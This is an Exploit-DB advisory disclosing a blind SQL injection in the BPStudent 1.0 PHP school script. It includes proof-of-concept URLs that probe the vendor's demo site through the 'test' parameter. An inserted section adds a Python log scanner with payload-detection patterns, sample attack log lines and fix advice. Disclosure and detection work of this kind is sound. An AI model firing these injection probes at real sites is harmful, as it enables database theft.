BPStudent 1.0 - Blind SQL Injection

EDB-ID: 9837
CVE: N/A
Author: OoN Boy
Type: webapps
Platform: PHP
Published: 2009-09-22

[x]========================================================================================================================================[x]
 |                                                      AntiSecurity[dot]org                                                                |
[x]========================================================================================================================================[x]



[x]========================================================================================================================================[x]
 | Title                : BPStudent 1.0 Blind SQL Injection Vulnerability                                                                   |
 | Software 		: BPStudent													    |
 | Vendor   		: http://bpowerhouse.info											    |
 | Date    		: 22 September 2009 ( Indonesia )										    |
 | Author   		: OoN_Boy													    |
 | Contact  		: oon.boy9@gmail.com												    |
 | Web	    		: http://oonboy.info												    |
 | Blog     		: http://oonboy.blogspot.com											    |
[x]========================================================================================================================================[x]



[x]========================================================================================================================================[x]
 | Technology		: PHP5                                                                                                              |
 | Database		: MySQL                                                                                                             |
 | Version		: 1.0                                                                                                               |
 | License		: GNU GPL                                                                                                           |
 | Price		: $27.90                                                                                                            |
 | Description          : This script is an on-site school script: students can register, download study material and take exams; the        |
 |                        system will mark the exams and students can graduate from courses; the administrator can create exams,             |
 |                        manage students and courses                                                                                        |
[x]========================================================================================================================================[x]



[x]========================================================================================================================================[x]
 | Google Dork          : find it yourself :)                                                                                                |
[x]========================================================================================================================================[x]



[x]========================================================================================================================================[x]
 | Exploit 		: http://localhost/[path]/students.php?page=preview&test=[sql]			 	 			    |
 | Admin Page           : http://localhost/[path]/admin/index.php                                                                            |
[x]========================================================================================================================================[x]



[x]========================================================================================================================================[x]
 | Proof of concept	: http://bpowerhouse.com/demos/bpstudentsDemo/students.php?page=preview&test=1+and+substring(@@version,1,1)=5 True  |
 |			  http://bpowerhouse.com/demos/bpstudentsDemo/students.php?page=preview&test=1+and+substring(@@version,1,1)=4 False |
 |                      : You must log in to try the exploit :)                                                                              |
[x]========================================================================================================================================[x]
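The proof of concept above infers one character of @@version per request by asking the application a true/false question through the integer-typed `test` parameter. The following is an added detection example, not code from this advisory or from BPStudent: it scans web-server access-log lines for students.php requests whose `test` value is not the plain integer the page expects and labels the boolean-inference pattern the PoC uses. The log format, IP addresses, timestamps, install path and response sizes are constructed for the example.

```python
"""Added detection example for the blind SQL injection above (EDB-ID 9837).

Not code from the advisory or from BPStudent. It scans web-server access-log
lines for requests to students.php whose `test` parameter is not the plain
integer the page expects, and labels the boolean-inference pattern used in the
proof of concept. All log lines, addresses and paths below are constructed.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Combined-format access log, reduced to the fields the check needs.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Fingerprint of the boolean-based technique in the PoC: a conjunction that
# compares a server-side expression (substring(@@version,...) and the like),
# plus the time-based variants of the same idea.
BOOLEAN_INFERENCE_RE = re.compile(
    r'\b(?:and|or)\b.+\b(?:substring|substr|ascii|mid)\s*\('
    r'|@@version'
    r'|\b(?:sleep|benchmark)\s*\(',
    re.IGNORECASE,
)


def extract_test_param(target):
    """Return the decoded `test` query value of a students.php request, else None."""
    parts = urlsplit(target)
    if not parts.path.endswith('/students.php'):
        return None
    values = parse_qs(parts.query, keep_blank_values=True).get('test')
    return values[0] if values else None


def classify(test_value):
    """'ok' for the integer id the application expects; otherwise a finding label."""
    if test_value is None:
        return None
    if re.fullmatch(r'\d+', test_value):
        return 'ok'
    if BOOLEAN_INFERENCE_RE.search(test_value):
        return 'blind-sqli-boolean'
    return 'non-integer-test-param'


def scan(lines):
    """Return (ip, test_value, label, status) for each suspicious students.php request."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        value = extract_test_param(m.group('target'))
        label = classify(value)
        if label and label != 'ok':
            findings.append((m.group('ip'), value, label, m.group('status')))
    return findings


# Constructed sample log: a normal request, the two PoC probes from the advisory,
# a quote probe, and an unrelated admin request that must not be flagged.
SAMPLE_LOG = [
    '192.0.2.10 - - [22/Sep/2009:10:00:01 +0700] "GET /bpstudent/students.php?page=preview&test=1 HTTP/1.1" 200 5123',
    '192.0.2.10 - - [22/Sep/2009:10:00:05 +0700] "GET /bpstudent/students.php?page=preview&test=1+and+substring(@@version,1,1)=5 HTTP/1.1" 200 5123',
    '192.0.2.10 - - [22/Sep/2009:10:00:06 +0700] "GET /bpstudent/students.php?page=preview&test=1+and+substring(@@version,1,1)=4 HTTP/1.1" 200 4877',
    '192.0.2.10 - - [22/Sep/2009:10:00:09 +0700] "GET /bpstudent/students.php?page=preview&test=1%27 HTTP/1.1" 500 612',
    '198.51.100.7 - - [22/Sep/2009:10:01:00 +0700] "GET /bpstudent/admin/index.php HTTP/1.1" 200 2210',
]

if __name__ == '__main__':
    for ip, value, label, status in scan(SAMPLE_LOG):
        print(f'{ip}  {label:<24} status={status}  test={value!r}')
```

The integer check in `classify` is also the shape of the server-side fix: a `test` value that is cast to an integer, or bound as a prepared-statement parameter, can never reach the query as SQL text, so the true/false oracle the PoC relies on disappears. In the constructed sample the true probe returns the same page size as the baseline and the false probe a different one, which is exactly the signal a log review should look for when the parameter is not a plain number.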



[x]========================================================================================================================================[x]
 | Greetz		: antisecurity.org batamhacker.or.id                                                                                |
 |		 	  Vrs-hCk NoGe Paman zxvf Angela Zhang aJe H312Y yooogy mousekill }^-^{ martfella noname s4va                       |
 | 		  	  k1tk4t str0ke kaka11 ^s0n g0ku^ Joe Chawanua Ntc xx_user s3t4n IrcMafia em|nem Pandoe Ronny rere                  |
[x]========================================================================================================================================[x]



[x]========================================================================================================================================[x]
 | Note                 : Happy Eid al-Fitr, please forgive me in body and soul, forgive all my mistakes so far, everyone :)                 |
 |                        running off.... for a while.... bye bye.....                                                                       |
[x]========================================================================================================================================[x]